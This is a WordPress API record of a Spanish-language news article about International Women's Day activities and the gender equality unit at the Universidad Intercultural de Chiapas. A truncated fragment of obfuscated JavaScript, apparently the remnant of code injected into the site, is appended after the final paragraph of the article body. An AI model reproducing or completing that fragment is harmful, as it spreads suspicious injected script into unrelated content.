{"id":363,"date":"2022-03-09T03:51:38","date_gmt":"2022-03-09T03:51:38","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=363"},"modified":"2022-03-09T03:51:39","modified_gmt":"2022-03-09T03:51:39","slug":"refrenda-la-unich-su-compromiso-en-el-desarrollo-y-practicas-equitativas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=363","title":{"rendered":"Refrenda la UNICH su compromiso en el desarrollo y pr\u00e1cticas equitativas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"376\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-08-at-7.49.20-PM-1024x376.jpeg\" alt=\"\" class=\"wp-image-364\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-08-at-7.49.20-PM-1024x376.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-08-at-7.49.20-PM-300x110.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-08-at-7.49.20-PM-768x282.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-08-at-7.49.20-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- \u201cEn el \u00e1mbito de educaci\u00f3n que es lo que nos compete, estamos comprometidas y comprometidos con el desarrollo y pr\u00e1cticas equitativas, por eso es que hemos fundado nuestra unidad de g\u00e9nero y por eso convocamos a estos eventos, para concientizarlos a todos, entender que nuestro modelo educativo intercultural no puede ser pleno, si algunas personas quedan fuera, en el caso de hoy estamos refiri\u00e9ndonos a la situaci\u00f3n de las mujeres\u201d.<\/p>\n\n\n\n<p>Lo anterior lo expres\u00f3 Leticia Pons Bonals, Rectora de la Universidad Intercultural de Chiapas (Unich) tras el inicio de las actividades conmemorativas al D\u00eda Internacional de la Mujer que este a\u00f1o tienen el lema \u201cigualdad de g\u00e9nero hoy para un ma\u00f1ana sostenible\u201d, donde record\u00f3 como mujeres de todo el mundo \u201chan tenido que luchar por esto\u201d, a pesar de que no est\u00e1 todo solucionado, y que no vivimos en una sociedad equitativa.<\/p>\n\n\n\n<p>\u201cMas que celebrar conmemoramos este d\u00eda la lucha que han emprendido las mujeres a lo largo de la historia, para tener igualdad de condiciones en educaci\u00f3n , trabajo, participaci\u00f3n, en la vida p\u00fablica, y que si hoy gozamos algunas, de ciertos derechos es gracias a las luchas que tuvieron nuestras abuelas, las abuelas y otras mujeres\u201d, abund\u00f3.<\/p>\n\n\n\n<p>\u201cHoy nos toca refrendar que tiene que ver con el g\u00e9nero, porqu\u00e9 las mujeres vivimos hoy d\u00eda, que nos menosprecia, nos impiden alcanzar nuestro desarrollo pleno, es eso lo que se conmemora este d\u00eda\u201d, indic\u00f3.<\/p>\n\n\n\n<p>Por su parte, Alma Gabriela Siu Rodas, Coordinaci\u00f3n de Gesti\u00f3n de la Calidad y Titular de la Unidad de Enlace de Igualdad de G\u00e9nero, destac\u00f3 que como Universidad buscan certificarse en el tema de genero, ya que deben institucionalizar la perspectiva y transversalidad de g\u00e9nero en las Dependencias y Entidades de la<\/p>\n\n\n\n<p>Administraci\u00f3n P\u00fablica Estatal y encaminar acciones para lograr la igualdad sustantiva, mejorar el trato entre los g\u00e9neros, el acceso a las oportunidades, la toma de decisiones y los beneficios del desarrollo para las mujeres\u201d.<\/p>\n\n\n\n<p>Entre las Principales Funciones de la Unidad detall\u00f3 est\u00e1n planificar, implementar y dar seguimiento a la aplicaci\u00f3n de la perspectiva de g\u00e9nero, implementar herramientas metodol\u00f3gicas, procesos y procedimientos para monitorear y evaluar acciones institucionales realizadas en materia de g\u00e9nero e igualdad de la instituci\u00f3n, organizar y coordinar la capacitaci\u00f3n, formaci\u00f3n y certificaci\u00f3n del personal en materia de g\u00e9nero, transversalidad e igualdad sustantiva a quienes integran la unidad de igualdad de la instituci\u00f3n, entre otras.<\/p>\n\n\n\n<p>En este d\u00eda se realiz\u00f3 en coordinaci\u00f3n con la organizaci\u00f3n Cultural Abriendo<\/p>\n\n\n\n<p>Caminos: Jos\u00e9 Antonio Reyes Matamoros, lectura de creaciones literarias de escritoras en castellano y lenguas originarias, entre ellas Cristina Patisht\u00e1n, Norma Vargas Macossay, Angelina Suyul, Lyz S\u00e1enz e Isabel Pascual, k\u2019anjobal.<\/p>\n\n\n\n<p>Adem\u00e1s la ponencia \u201cRetos de la atenci\u00f3n, prevenci\u00f3n, sanci\u00f3n y erradicaci\u00f3n de la violencia de g\u00e9nero en las universidades\u201d por Ang\u00e9lica Aremy Evangelista Garc\u00eda\/ Investigadora en El Colegio de la Frontera Sur y Blanca Olivia Vel\u00e1zquez Torres, del El Colectivo Feminista Mercedes Olivera y Bustamante A.C. (COFEMO), cerrando con el Conservatorio \u201cvoces de mujeres ind\u00edgenas en los medios de comunicaci\u00f3n\u201d, en coordinaci\u00f3n con el INALI.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- \u201cEn el \u00e1mbito de educaci\u00f3n que es lo que nos compete, estamos comprometidas y comprometidos con el desarrollo y pr\u00e1cticas equitativas, por eso es que hemos fundado nuestra unidad de g\u00e9nero y por eso convocamos a estos eventos, para concientizarlos a todos, entender que nuestro modelo educativo intercultural &hellip;<\/p>\n","protected":false},"author":2,"featured_media":364,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-363","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/363","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=363"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/363\/revisions"}],"predecessor-version":[{"id":365,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/363\/revisions\/365"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/364"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=363"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=363"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=363"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}